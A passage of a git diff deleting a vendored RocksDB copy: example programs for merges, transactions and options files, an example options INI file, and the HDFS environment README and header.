-    fprintf(stderr, "Error deleting /tmp/rocksmergetest, code: %d\n", ret);
-    return ret;
-  }
-  rocksdb::Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new MyMerge);
-  options.compaction_filter = &filter;
-  status = rocksdb::DB::Open(options, "/tmp/rocksmergetest", &raw_db);
-  assert(status.ok());
-  std::unique_ptr<rocksdb::DB> db(raw_db);
-
-  rocksdb::WriteOptions wopts;
-  db->Merge(wopts, "0", "bad");  // This is filtered out
-  db->Merge(wopts, "1", "data1");
-  db->Merge(wopts, "1", "bad");
-  db->Merge(wopts, "1", "data2");
-  db->Merge(wopts, "1", "bad");
-  db->Merge(wopts, "3", "data3");
-  db->CompactRange(rocksdb::CompactRangeOptions(), nullptr, nullptr);
-  fprintf(stderr, "filter.count_ = %d\n", filter.count_);
-  assert(filter.count_ == 0);
-  fprintf(stderr, "filter.merge_count_ = %d\n", filter.merge_count_);
-  assert(filter.merge_count_ == 6);
-}
diff --git a/thirdparty/rocksdb/examples/optimistic_transaction_example.cc b/thirdparty/rocksdb/examples/optimistic_transaction_example.cc
deleted file mode 100644
index 94444e1..0000000
--- a/thirdparty/rocksdb/examples/optimistic_transaction_example.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_transaction_example";
-
-int main() {
-  // open DB
-  Options options;
-  options.create_if_missing = true;
-  DB* db;
-  OptimisticTransactionDB* txn_db;
-
-  Status s = OptimisticTransactionDB::Open(options, kDBPath, &txn_db);
-  assert(s.ok());
-  db = txn_db->GetBaseDB();
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple OptimisticTransaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  txn->Put("abc", "def");
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  db->Put(write_options, "abc", "xyz");
-
-  // Read a key using the snapshot
-  read_options.snapshot = snapshot;
-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(value == "def");
-
-  // Attempt to commit transaction
-  s = txn->Commit();
-
-  // Transaction could not commit since the write outside of the txn conflicted
-  // with the read!
-  assert(s.IsBusy());
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  read_options.snapshot = db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Commit.  Since the snapshot was advanced, the write done outside of the
-  // transaction does not prevent this transaction from Committing.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/examples/options_file_example.cc b/thirdparty/rocksdb/examples/options_file_example.cc
deleted file mode 100644
index 5dd0a47..0000000
--- a/thirdparty/rocksdb/examples/options_file_example.cc
+++ /dev/null
@@ -1,113 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file demonstrates how to use the utility functions defined in
-// rocksdb/utilities/options_util.h to open a rocksdb database without
-// remembering all the rocksdb options.
-#include <cstdio>
-#include <string>
-#include <vector>
-
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/options_util.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_options_file_example";
-
-namespace {
-// A dummy compaction filter
-class DummyCompactionFilter : public CompactionFilter {
- public:
-  virtual ~DummyCompactionFilter() {}
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value, bool* value_changed) const {
-    return false;
-  }
-  virtual const char* Name() const { return "DummyCompactionFilter"; }
-};
-
-}  // namespace
-
-int main() {
-  DBOptions db_opt;
-  db_opt.create_if_missing = true;
-
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  cf_descs.push_back({kDefaultColumnFamilyName, ColumnFamilyOptions()});
-  cf_descs.push_back({"new_cf", ColumnFamilyOptions()});
-
-  // initialize BlockBasedTableOptions
-  auto cache = NewLRUCache(1 * 1024 * 1024 * 1024);
-  BlockBasedTableOptions bbt_opts;
-  bbt_opts.block_size = 32 * 1024;
-  bbt_opts.block_cache = cache;
-
-  // initialize column families options
-  std::unique_ptr<CompactionFilter> compaction_filter;
-  compaction_filter.reset(new DummyCompactionFilter());
-  cf_descs[0].options.table_factory.reset(NewBlockBasedTableFactory(bbt_opts));
-  cf_descs[0].options.compaction_filter = compaction_filter.get();
-  cf_descs[1].options.table_factory.reset(NewBlockBasedTableFactory(bbt_opts));
-
-  // destroy and open DB
-  DB* db;
-  Status s = DestroyDB(kDBPath, Options(db_opt, cf_descs[0].options));
-  assert(s.ok());
-  s = DB::Open(Options(db_opt, cf_descs[0].options), kDBPath, &db);
-  assert(s.ok());
-
-  // Create column family, and rocksdb will persist the options.
-  ColumnFamilyHandle* cf;
-  s = db->CreateColumnFamily(ColumnFamilyOptions(), "new_cf", &cf);
-  assert(s.ok());
-
-  // close DB
-  delete cf;
-  delete db;
-
-  // In the following code, we will reopen the rocksdb instance using
-  // the options file stored in the db directory.
-
-  // Load the options file.
-  DBOptions loaded_db_opt;
-  std::vector<ColumnFamilyDescriptor> loaded_cf_descs;
-  s = LoadLatestOptions(kDBPath, Env::Default(), &loaded_db_opt,
-                        &loaded_cf_descs);
-  assert(s.ok());
-  assert(loaded_db_opt.create_if_missing == db_opt.create_if_missing);
-
-  // Initialize pointer options for each column family
-  for (size_t i = 0; i < loaded_cf_descs.size(); ++i) {
-    auto* loaded_bbt_opt = reinterpret_cast<BlockBasedTableOptions*>(
-        loaded_cf_descs[0].options.table_factory->GetOptions());
-    // Expect the same as BlockBasedTableOptions will be loaded form file.
-    assert(loaded_bbt_opt->block_size == bbt_opts.block_size);
-    // However, block_cache needs to be manually initialized as documented
-    // in rocksdb/utilities/options_util.h.
-    loaded_bbt_opt->block_cache = cache;
-  }
-  // In addition, as pointer options are initialized with default value,
-  // we need to properly initialized all the pointer options if non-defalut
-  // values are used before calling DB::Open().
-  assert(loaded_cf_descs[0].options.compaction_filter == nullptr);
-  loaded_cf_descs[0].options.compaction_filter = compaction_filter.get();
-
-  // reopen the db using the loaded options.
-  std::vector<ColumnFamilyHandle*> handles;
-  s = DB::Open(loaded_db_opt, kDBPath, loaded_cf_descs, &handles, &db);
-  assert(s.ok());
-
-  // close DB
-  for (auto* handle : handles) {
-    delete handle;
-  }
-  delete db;
-}
diff --git a/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini b/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini
deleted file mode 100644
index 8e07131..0000000
--- a/thirdparty/rocksdb/examples/rocksdb_option_file_example.ini
+++ /dev/null
@@ -1,143 +0,0 @@
-# This is a RocksDB option file.
-#
-# A typical RocksDB options file has four sections, which are
-# Version section, DBOptions section, at least one CFOptions
-# section, and one TableOptions section for each column family.
-# The RocksDB options file in general follows the basic INI
-# file format with the following extensions / modifications:
-#
-#  * Escaped characters
-#    We escaped the following characters:
-#     - \n -- line feed - new line
-#     - \r -- carriage return
-#     - \\ -- backslash \
-#     - \: -- colon symbol :
-#     - \# -- hash tag #
-#  * Comments
-#    We support # style comments.  Comments can appear at the ending
-#    part of a line.
-#  * Statements
-#    A statement is of the form option_name = value.
-#    Each statement contains a '=', where extra white-spaces
-#    are supported. However, we don't support multi-lined statement.
-#    Furthermore, each line can only contain at most one statement.
-#  * Sections
-#    Sections are of the form [SecitonTitle "SectionArgument"],
-#    where section argument is optional.
-#  * List
-#    We use colon-separated string to represent a list.
-#    For instance, n1:n2:n3:n4 is a list containing four values.
-#
-# Below is an example of a RocksDB options file:
-[Version]
-  rocksdb_version=4.3.0
-  options_file_version=1.1
-
-[DBOptions]
-  stats_dump_period_sec=600
-  max_manifest_file_size=18446744073709551615
-  bytes_per_sync=8388608
-  delayed_write_rate=2097152
-  WAL_ttl_seconds=0
-  WAL_size_limit_MB=0
-  max_subcompactions=1
-  wal_dir=
-  wal_bytes_per_sync=0
-  db_write_buffer_size=0
-  keep_log_file_num=1000
-  table_cache_numshardbits=4
-  max_file_opening_threads=1
-  writable_file_max_buffer_size=1048576
-  random_access_max_buffer_size=1048576
-  use_fsync=false
-  max_total_wal_size=0
-  max_open_files=-1
-  skip_stats_update_on_db_open=false
-  max_background_compactions=16
-  manifest_preallocation_size=4194304
-  max_background_flushes=7
-  is_fd_close_on_exec=true
-  max_log_file_size=0
-  advise_random_on_open=true
-  create_missing_column_families=false
-  paranoid_checks=true
-  delete_obsolete_files_period_micros=21600000000
-  log_file_time_to_roll=0
-  compaction_readahead_size=0
-  create_if_missing=false
-  use_adaptive_mutex=false
-  enable_thread_tracking=false
-  allow_fallocate=true
-  error_if_exists=false
-  recycle_log_file_num=0
-  skip_log_error_on_recovery=false
-  db_log_dir=
-  new_table_reader_for_compaction_inputs=true
-  allow_mmap_reads=false
-  allow_mmap_writes=false
-  use_direct_reads=false
-  use_direct_writes=false
-
-
-[CFOptions "default"]
-  compaction_style=kCompactionStyleLevel
-  compaction_filter=nullptr
-  num_levels=6
-  table_factory=BlockBasedTable
-  comparator=leveldb.BytewiseComparator
-  max_sequential_skip_in_iterations=8
-  soft_rate_limit=0.000000
-  max_bytes_for_level_base=1073741824
-  memtable_prefix_bloom_probes=6
-  memtable_prefix_bloom_bits=0
-  memtable_prefix_bloom_huge_page_tlb_size=0
-  max_successive_merges=0
-  arena_block_size=16777216
-  min_write_buffer_number_to_merge=1
-  target_file_size_multiplier=1
-  source_compaction_factor=1
-  max_bytes_for_level_multiplier=8
-  max_bytes_for_level_multiplier_additional=2:3:5
-  compaction_filter_factory=nullptr
-  max_write_buffer_number=8
-  level0_stop_writes_trigger=20
-  compression=kSnappyCompression
-  level0_file_num_compaction_trigger=4
-  purge_redundant_kvs_while_flush=true
-  max_write_buffer_number_to_maintain=0
-  memtable_factory=SkipListFactory
-  max_grandparent_overlap_factor=8
-  expanded_compaction_factor=25
-  hard_pending_compaction_bytes_limit=137438953472
-  inplace_update_num_locks=10000
-  level_compaction_dynamic_level_bytes=true
-  level0_slowdown_writes_trigger=12
-  filter_deletes=false
-  verify_checksums_in_compaction=true
-  min_partial_merge_operands=2
-  paranoid_file_checks=false
-  target_file_size_base=134217728
-  optimize_filters_for_hits=false
-  merge_operator=PutOperator
-  compression_per_level=kNoCompression:kNoCompression:kNoCompression:kSnappyCompression:kSnappyCompression:kSnappyCompression
-  compaction_measure_io_stats=false
-  prefix_extractor=nullptr
-  bloom_locality=0
-  write_buffer_size=134217728
-  disable_auto_compactions=false
-  inplace_update_support=false
-
-[TableOptions/BlockBasedTable "default"]
-  format_version=2
-  whole_key_filtering=true
-  no_block_cache=false
-  checksum=kCRC32c
-  filter_policy=rocksdb.BuiltinBloomFilter
-  block_size_deviation=10
-  block_size=8192
-  block_restart_interval=16
-  cache_index_and_filter_blocks=false
-  pin_l0_filter_and_index_blocks_in_cache=false
-  index_type=kBinarySearch
-  hash_index_allow_collision=true
-  flush_block_policy_factory=FlushBlockBySizePolicyFactory
diff --git a/thirdparty/rocksdb/examples/simple_example.cc b/thirdparty/rocksdb/examples/simple_example.cc
deleted file mode 100644
index a8f80f0..0000000
--- a/thirdparty/rocksdb/examples/simple_example.cc
+++ /dev/null
@@ -1,83 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstdio>
-#include <string>
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_simple_example";
-
-int main() {
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  {
-    PinnableSlice pinnable_val;
-    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-    assert(pinnable_val == "value");
-  }
-
-  {
-    std::string string_val;
-    // If it cannot pin the value, it copies the value to its internal buffer.
-    // The intenral buffer could be set during construction.
-    PinnableSlice pinnable_val(&string_val);
-    db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-    assert(pinnable_val == "value");
-    // If the value is not pinned, the internal buffer must have the value.
-    assert(pinnable_val.IsPinned() || string_val == "value");
-  }
-
-  PinnableSlice pinnable_val;
-  db->Get(ReadOptions(), db->DefaultColumnFamily(), "key1", &pinnable_val);
-  assert(s.IsNotFound());
-  // Reset PinnableSlice after each use and before each reuse
-  pinnable_val.Reset();
-  db->Get(ReadOptions(), db->DefaultColumnFamily(), "key2", &pinnable_val);
-  assert(pinnable_val == "value");
-  pinnable_val.Reset();
-  // The Slice pointed by pinnable_val is not valid after this point
-
-  delete db;
-
-  return 0;
-}
diff --git a/thirdparty/rocksdb/examples/transaction_example.cc b/thirdparty/rocksdb/examples/transaction_example.cc
deleted file mode 100644
index 7274cf7..0000000
--- a/thirdparty/rocksdb/examples/transaction_example.cc
+++ /dev/null
@@ -1,144 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-
-using namespace rocksdb;
-
-std::string kDBPath = "/tmp/rocksdb_transaction_example";
-
-int main() {
-  // open DB
-  Options options;
-  TransactionDBOptions txn_db_options;
-  options.create_if_missing = true;
-  TransactionDB* txn_db;
-
-  Status s = TransactionDB::Open(options, txn_db_options, kDBPath, &txn_db);
-  assert(s.ok());
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  TransactionOptions txn_options;
-  std::string value;
-
-  ////////////////////////////////////////////////////////
-  //
-  // Simple Transaction Example ("Read Committed")
-  //
-  ////////////////////////////////////////////////////////
-
-  // Start a transaction
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  assert(txn);
-
-  // Read a key in this transaction
-  s = txn->Get(read_options, "abc", &value);
-  assert(s.IsNotFound());
-
-  // Write a key in this transaction
-  s = txn->Put("abc", "def");
-  assert(s.ok());
-
-  // Read a key OUTSIDE this transaction. Does not affect txn.
-  s = txn_db->Get(read_options, "abc", &value);
-
-  // Write a key OUTSIDE of this transaction.
-  // Does not affect txn since this is an unrelated key.  If we wrote key 'abc'
-  // here, the transaction would fail to commit.
-  s = txn_db->Put(write_options, "xyz", "zzz");
-
-  // Commit transaction
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Repeatable Read" (Snapshot Isolation) Example
-  //   -- Using a single Snapshot
-  //
-  ////////////////////////////////////////////////////////
-
-  // Set a snapshot at start of transaction by setting set_snapshot=true
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  const Snapshot* snapshot = txn->GetSnapshot();
-
-  // Write a key OUTSIDE of transaction
-  s = txn_db->Put(write_options, "abc", "xyz");
-  assert(s.ok());
-
-  // Attempt to read a key using the snapshot.  This will fail since
-  // the previous write outside this txn conflicts with this read.
-  read_options.snapshot = snapshot;
-  s = txn->GetForUpdate(read_options, "abc", &value);
-  assert(s.IsBusy());
-
-  txn->Rollback();
-
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-  snapshot = nullptr;
-
-  ////////////////////////////////////////////////////////
-  //
-  // "Read Committed" (Monotonic Atomic Views) Example
-  //   --Using multiple Snapshots
-  //
-  ////////////////////////////////////////////////////////
-
-  // In this example, we set the snapshot multiple times.  This is probably
-  // only necessary if you have very strict isolation requirements to
-  // implement.
-
-  // Set a snapshot at start of transaction
-  txn_options.set_snapshot = true;
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-
-  // Do some reads and writes to key "x"
-  read_options.snapshot = txn_db->GetSnapshot();
-  s = txn->Get(read_options, "x", &value);
-  txn->Put("x", "x");
-
-  // Do a write outside of the transaction to key "y"
-  s = txn_db->Put(write_options, "y", "y");
-
-  // Set a new snapshot in the transaction
-  txn->SetSnapshot();
-  txn->SetSavePoint();
-  read_options.snapshot = txn_db->GetSnapshot();
-
-  // Do some reads and writes to key "y"
-  // Since the snapshot was advanced, the write done outside of the
-  // transaction does not conflict.
-  s = txn->GetForUpdate(read_options, "y", &value);
-  txn->Put("y", "y");
-
-  // Decide we want to revert the last write from this transaction.
-  txn->RollbackToSavePoint();
-
-  // Commit.
-  s = txn->Commit();
-  assert(s.ok());
-  delete txn;
-  // Clear snapshot from read options since it is no longer valid
-  read_options.snapshot = nullptr;
-
-  // Cleanup
-  delete txn_db;
-  DestroyDB(kDBPath, options);
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/hdfs/README b/thirdparty/rocksdb/hdfs/README
deleted file mode 100644
index 9036511..0000000
--- a/thirdparty/rocksdb/hdfs/README
+++ /dev/null
@@ -1,23 +0,0 @@
-This directory contains the hdfs extensions needed to make rocksdb store
-files in HDFS.
-
-It has been compiled and testing against CDH 4.4 (2.0.0+1475-1.cdh4.4.0.p0.23~precise-cdh4.4.0).
-
-The configuration assumes that packages libhdfs0, libhdfs0-dev are 
-installed which basically means that hdfs.h is in /usr/include and libhdfs in /usr/lib
-
-The env_hdfs.h file defines the rocksdb objects that are needed to talk to an
-underlying filesystem. 
-
-If you want to compile rocksdb with hdfs support, please set the following
-environment variables appropriately (also defined in setup.sh for convenience)
-   USE_HDFS=1
-   JAVA_HOME=/usr/local/jdk-7u79-64
-   LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/jdk-7u79-64/jre/lib/amd64/server:/usr/local/jdk-7u79-64/jre/lib/amd64/:./snappy/libs
-   make clean all db_bench
-
-To run dbbench,
-  set CLASSPATH to include your hadoop distribution
-  db_bench --hdfs="hdfs://hbaseudbperf001.snc1.facebook.com:9000"
-
-
diff --git a/thirdparty/rocksdb/hdfs/env_hdfs.h b/thirdparty/rocksdb/hdfs/env_hdfs.h
deleted file mode 100644
index 3a62bc8..0000000
--- a/thirdparty/rocksdb/hdfs/env_hdfs.h
+++ /dev/null
@@ -1,374 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-#include <algorithm>
-#include <stdio.h>
-#include <time.h>
-#include <iostream>
-#include "port/sys_time.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-
-#ifdef USE_HDFS
-#include <hdfs.h>
-
-namespace rocksdb {
-
-// Thrown during execution when there is an issue with the supplied
-// arguments.
-class HdfsUsageException : public std::exception { };
-
-// A simple exception that indicates something went wrong that is not
-// recoverable.  The intention is for the message to be printed (with
-// nothing else) and the process terminate.
-class HdfsFatalException : public std::exception {
-public:
-  explicit HdfsFatalException(const std::string& s) : what_(s) { }
-  virtual ~HdfsFatalException() throw() { }
-  virtual const char* what() const throw() {
-    return what_.c_str();
-  }
-private:
-  const std::string what_;
-};
-
-//
-// The HDFS environment for rocksdb. This class overrides all the
-// file/dir access methods and delegates the thread-mgmt methods to the
-// default posix environment.
-//
-class HdfsEnv : public Env {
-
- public:
-  explicit HdfsEnv(const std::string& fsname) : fsname_(fsname) {
-    posixEnv = Env::Default();
-    fileSys_ = connectToPath(fsname_);
-  }
-
-  virtual ~HdfsEnv() {
-    fprintf(stderr, "Destroying HdfsEnv::Default()\n");
-    hdfsDisconnect(fileSys_);
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   std::unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options);
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     std::unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options);
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 std::unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options);
-
-  virtual Status NewDirectory(const std::string& name,
-                              std::unique_ptr<Directory>* result);
-
-  virtual Status FileExists(const std::string& fname);
-
-  virtual Status GetChildren(const std::string& path,
-                             std::vector<std::string>* result);
-
-  virtual Status DeleteFile(const std::string& fname);
-
-  virtual Status CreateDir(const std::string& name);
-
-  virtual Status CreateDirIfMissing(const std::string& name);
-
-  virtual Status DeleteDir(const std::string& name);
-
-  virtual Status GetFileSize(const std::string& fname, uint64_t* size);
-
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime);
-
-  virtual Status RenameFile(const std::string& src, const std::string& target);
-
-  virtual Status LinkFile(const std::string& src, const std::string& target) {
-    return Status::NotSupported(); // not supported
-  }
-
-  virtual Status LockFile(const std::string& fname, FileLock** lock);
-
-  virtual Status UnlockFile(FileLock* lock);
-
-  virtual Status NewLogger(const std::string& fname,
-                           std::shared_ptr<Logger>* result);
-
-  virtual void Schedule(void (*function)(void* arg), void* arg,
-                        Priority pri = LOW, void* tag = nullptr, void (*unschedFunction)(void* arg) = 0) {
-    posixEnv->Schedule(function, arg, pri, tag, unschedFunction);
-  }
-
-  virtual int UnSchedule(void* tag, Priority pri) {
-    return posixEnv->UnSchedule(tag, pri);
-  }
-
-  virtual void StartThread(void (*function)(void* arg), void* arg) {
-    posixEnv->StartThread(function, arg);
-  }
-
-  virtual void WaitForJoin() { posixEnv->WaitForJoin(); }
-
-  virtual unsigned int GetThreadPoolQueueLen(Priority pri = LOW) const
-      override {
-    return posixEnv->GetThreadPoolQueueLen(pri);
-  }
-
-  virtual Status GetTestDirectory(std::string* path) {
-    return posixEnv->GetTestDirectory(path);
-  }
-
-  virtual uint64_t NowMicros() {
-    return posixEnv->NowMicros();
-  }
-
-  virtual void SleepForMicroseconds(int micros) {
-    posixEnv->SleepForMicroseconds(micros);
-  }
-
-  virtual Status GetHostName(char* name, uint64_t len) {
-    return posixEnv->GetHostName(name, len);
-  }
-
-  virtual Status GetCurrentTime(int64_t* unix_time) {
-    return posixEnv->GetCurrentTime(unix_time);
-  }
-
-  virtual Status GetAbsolutePath(const std::string& db_path,
-      std::string* output_path) {
-    return posixEnv->GetAbsolutePath(db_path, output_path);
-  }
-
-  virtual void SetBackgroundThreads(int number, Priority pri = LOW) {
-    posixEnv->SetBackgroundThreads(number, pri);
-  }
-
-  virtual int GetBackgroundThreads(Priority pri = LOW) {
-    return posixEnv->GetBackgroundThreads(pri);
-  }
-
-  virtual void IncBackgroundThreadsIfNeeded(int number, Priority pri) override {
-    posixEnv->IncBackgroundThreadsIfNeeded(number, pri);
-  }
-
-  virtual std::string TimeToString(uint64_t number) {
-    return posixEnv->TimeToString(number);
-  }
-
-  static uint64_t gettid() {
-    assert(sizeof(pthread_t) <= sizeof(uint64_t));
-    return (uint64_t)pthread_self();
-  }
-
-  virtual uint64_t GetThreadID() const override {
-    return HdfsEnv::gettid();
-  }
-
- private:
-  std::string fsname_;  // string of the form "hdfs://hostname:port/"
-  hdfsFS fileSys_;      //  a single FileSystem object for all files
-  Env*  posixEnv;       // This object is derived from Env, but not from
-                        // posixEnv. We have posixnv as an encapsulated
-                        // object here so that we can use posix timers,
-                        // posix threads, etc.
-
-  static const std::string kProto;
-  static const std::string pathsep;
-
-  /**
-   * If the URI is specified of the form hdfs://server:port/path,
-   * then connect to the specified cluster
-   * else connect to default.
-   */
-  hdfsFS connectToPath(const std::string& uri) {
-    if (uri.empty()) {
-      return nullptr;
-    }
-    if (uri.find(kProto) != 0) {
-      // uri doesn't start with hdfs:// -> use default:0, which is special
-      // to libhdfs.
-      return hdfsConnectNewInstance("default", 0);
-    }
-    const std::string hostport = uri.substr(kProto.length());
-
-    std::vector <std::string> parts;
-    split(hostport, ':', parts);
-    if (parts.size() != 2) {
-      throw HdfsFatalException("Bad uri for hdfs " + uri);
-    }
-    // parts[0] = hosts, parts[1] = port/xxx/yyy
-    std::string host(parts[0]);
-    std::string remaining(parts[1]);
-
-    int rem = remaining.find(pathsep);
-    std::string portStr = (rem == 0 ? remaining :
-                           remaining.substr(0, rem));
-
-    tPort port;
-    port = atoi(portStr.c_str());
-    if (port == 0) {
-      throw HdfsFatalException("Bad host-port for hdfs " + uri);
-    }
-    hdfsFS fs = hdfsConnectNewInstance(host.c_str(), port);
-    return fs;
-  }
-
-  void split(const std::string &s, char delim,
-             std::vector<std::string> &elems) {
-    elems.clear();
-    size_t prev = 0;
-    size_t pos = s.find(delim);
-    while (pos != std::string::npos) {
-      elems.push_back(s.substr(prev, pos));
-      prev = pos + 1;
-      pos = s.find(delim, prev);
-    }
-    elems.push_back(s.substr(prev, s.size()));
-  }
-};
-
-}  // namespace rocksdb
-
-#else // USE_HDFS
-
-
-namespace rocksdb {
-
-static const Status notsup;
-
-class HdfsEnv : public Env {
-
- public:
-  explicit HdfsEnv(const std::string& fsname) {
-    fprintf(stderr, "You have not build rocksdb with HDFS support\n");
-    fprintf(stderr, "Please see hdfs/README for details\n");
-    abort();
-  }
-
-  virtual ~HdfsEnv() {
-  }
-
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options) override;
-
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options) override {
-    return notsup;
-  }
-
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) override {
-    return notsup;
-  }
-
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) override {
-    return notsup;
-  }
-
-  virtual Status FileExists(const std::string& fname) override {
-    return notsup;
-  }
-
-  virtual Status GetChildren(const std::string& path,
-                             std::vector<std::string>* result) override {
-    return notsup;
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    return notsup;
-  }
-
-  virtual Status CreateDir(const std::string& name) override { return notsup; }
-
-  virtual Status CreateDirIfMissing(const std::string& name) override {
-    return notsup;
-  }
-
-  virtual Status DeleteDir(const std::string& name) override { return notsup; }
-
